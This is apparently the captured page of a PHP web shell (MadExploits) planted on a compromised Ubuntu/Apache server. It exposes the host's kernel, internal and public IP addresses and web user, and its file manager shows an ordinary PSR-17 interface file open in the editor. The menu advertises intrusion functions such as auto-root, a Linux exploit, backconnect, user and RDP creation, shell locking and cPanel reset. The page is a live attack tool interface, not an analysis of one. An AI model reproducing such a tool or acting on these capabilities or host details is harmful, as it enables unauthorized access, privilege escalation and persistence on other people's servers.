Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.14.144.240
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amply /
vendor /
psr /
http-factory /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
RequestFactoryInterface.php
499
B
-rw-rw-r--
ResponseFactoryInterface.php
546
B
-rw-rw-r--
ServerRequestFactoryInterface....
927
B
-rw-rw-r--
StreamFactoryInterface.php
1.38
KB
-rw-rw-r--
UploadedFileFactoryInterface.p...
1.08
KB
-rw-rw-r--
UriFactoryInterface.php
325
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ServerRequestFactoryInterface.php
<?php namespace Psr\Http\Message; interface ServerRequestFactoryInterface { /** * Create a new server request. * * Note that server-params are taken precisely as given - no parsing/processing * of the given values is performed, and, in particular, no attempt is made to * determine the HTTP method or URI, which must be provided explicitly. * * @param string $method The HTTP method associated with the request. * @param UriInterface|string $uri The URI associated with the request. If * the value is a string, the factory MUST create a UriInterface * instance based on it. * @param array $serverParams Array of SAPI parameters with which to seed * the generated request instance. * * @return ServerRequestInterface */ public function createServerRequest(string $method, $uri, array $serverParams = []): ServerRequestInterface; }
Close